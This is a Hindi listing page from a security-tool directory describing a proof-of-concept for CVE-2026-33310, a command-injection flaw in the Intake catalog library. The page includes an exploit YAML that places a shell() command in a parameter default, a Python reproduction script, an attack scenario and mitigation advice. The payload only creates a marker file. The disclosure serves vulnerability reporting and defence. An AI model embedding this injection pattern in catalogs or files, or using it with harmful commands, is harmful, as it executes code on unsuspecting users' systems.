Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33310 — प्रूफ-ऑफ-कॉन्सेप्ट जो Intake कैटलॉग के पैरामीटर डिफ़ॉल्ट में shell() विस्तार के माध्यम से कमांड इंजेक्शन प्रदर्शित करता है, साथ में एक्सप्लॉइट YAML और प्रजनन स्क्रिप्ट। | Kitploit
उपकरण/GitHubGitHub/redyank/cve-2026-33310
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब सुरक्षाकमांड एंड कंट्रोल
GitHubredyank/cve-2026-33310

CVE-2026-33310

प्रूफ-ऑफ-कॉन्सेप्ट जो Intake कैटलॉग के पैरामीटर डिफ़ॉल्ट में shell() विस्तार के माध्यम से कमांड इंजेक्शन प्रदर्शित करता है, साथ में एक्सप्लॉइट YAML और प्रजनन स्क्रिप्ट।

रिपॉजिटरी देखें
14 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33310

CVE-2026-33310 (पैरामीटर डिफ़ॉल्ट में shell() विस्तार के माध्यम से कमांड इंजेक्शन)

सारांश

पैरामीटर डिफ़ॉल्ट मानों के भीतर shell() सिंटैक्स कैटलॉग पार्सिंग प्रक्रिया के दौरान स्वचालित रूप से विस्तारित होता प्रतीत होता है। यदि किसी कैटलॉग में shell() जैसा पैरामीटर डिफ़ॉल्ट शामिल है, तो कैटलॉग स्रोत तक पहुँचने पर कमांड निष्पादित हो सकती है। इसका अर्थ है कि यदि कोई उपयोगकर्ता दुर्भावनापूर्ण कैटलॉग YAML लोड करता है, तो एम्बेडेड कमांड होस्ट सिस्टम पर निष्पादित हो सकती हैं। यह व्यवहार संभावित रूप से CWE-78: OS कमांड इंजेक्शन / असुरक्षित शेल विस्तार के रूप में वर्गीकृत किया जा सकता है।

विवरण

समस्या उत्पन्न होती प्रतीत होती है कि कैटलॉग स्रोत तक पहुँचने पर पैरामीटर डिफ़ॉल्ट मानों का विस्तार कैसे किया जाता है।

कैटलॉग लोडिंग और स्रोत पहुँच के दौरान:

Intake पैरामीटर डिफ़ॉल्ट मानों को हल करता है डिफ़ॉल्ट विस्तार के लिए जिम्मेदार फ़ंक्शन shell() सिंटैक्स को संसाधित करता है शेल एक्सप्रेशन एक सबप्रोसेस निष्पादन को ट्रिगर करता है क्योंकि यह कैटलॉग मूल्यांकन के दौरान होता है, उपयोगकर्ता द्वारा डेटासेट के साथ स्पष्ट रूप से इंटरैक्ट करने से पहले ही कमांड निष्पादित हो सकती है।

प्रभावित तर्क में निम्न शामिल प्रतीत होता है:

root@kitploit:~
expand_defaults()

और संबंधित पैरामीटर पार्सिंग तंत्र।

PoC

exploit.yaml

root@kitploit:~
metadata:
  version: 1
sources:
  rce_test:
    driver: csv
    description: "Testing shell expansion in parameters"
    args:
      urlpath: "{{ cmd_exec }}"
    parameters:
      cmd_exec:
        display_name: "Test Parameter"
        type: str
        default: "shell(touch /tmp/intake_rce_test)"

reproduce.py

root@kitploit:~
import intake
import os

PROOF_FILE = "/tmp/intake_rce_test"

if os.path.exists(PROOF_FILE):
    os.remove(PROOF_FILE)

print(f"[*] Proof file exists before: {os.path.exists(PROOF_FILE)}")

try:
    cat = intake.open_catalog("exploit.yaml")

    print("Accessing source...")
    _ = cat["rce_test"]

except Exception as e:
    print(f" Error during execution: {e}")

if os.path.exists(PROOF_FILE):
    print(f" Command execution confirmed, Found: {PROOF_FILE}")
else:
    print("Command execution did not occur.")

हमले का परिदृश्य

एक संभावित हमले का परिदृश्य इस प्रकार हो सकता है:

  1. एक हमलावर एक दुर्भावनापूर्ण Intake कैटलॉग YAML फ़ाइल प्रकाशित करता है
  2. पीड़ित कैटलॉग डाउनलोड या लोड करता है
  3. पीड़ित कैटलॉग में एक स्रोत प्रविष्टि तक पहुँचता है
  4. पैरामीटर डिफ़ॉल्ट विस्तारित होते हैं
  5. shell() एक्सप्रेशन एम्बेडेड कमांड के निष्पादन को ट्रिगर करता है

प्रभाव

यदि यह व्यवहार अनपेक्षित होने की पुष्टि होती है, तो एक हमलावर निम्न माध्यम से दुर्भावनापूर्ण कैटलॉग फ़ाइल वितरित कर सकता है:

  • Git रिपॉजिटरी
  • साझा डेटासेट
  • URL
  • डेटा विज्ञान वर्कफ़्लो
  • कैटलॉग लोड करने वाला कोई भी उपयोगकर्ता अपने स्थानीय उपयोगकर्ता विशेषाधिकारों के साथ अनजाने में कमांड निष्पादित कर सकता है।

अनुशंसा

संभावित शमन उपायों में शामिल हो सकते हैं:

  • डिफ़ॉल्ट रूप से shell() विस्तार को अक्षम करना
  • एक स्पष्ट ऑप्ट-इन फ़्लैग की आवश्यकता (जैसे, allow_shell=True)
  • अविश्वसनीय स्रोतों से लोड किए गए कैटलॉग के लिए शेल निष्पादन को प्रतिबंधित करना कृपया मुझे बताएं यदि अतिरिक्त जानकारी या परीक्षण की आवश्यकता है। मैं आगे के विश्लेषण या सत्यापन में सहायता करने में प्रसन्न हूं।
टूल डाउनलोड करें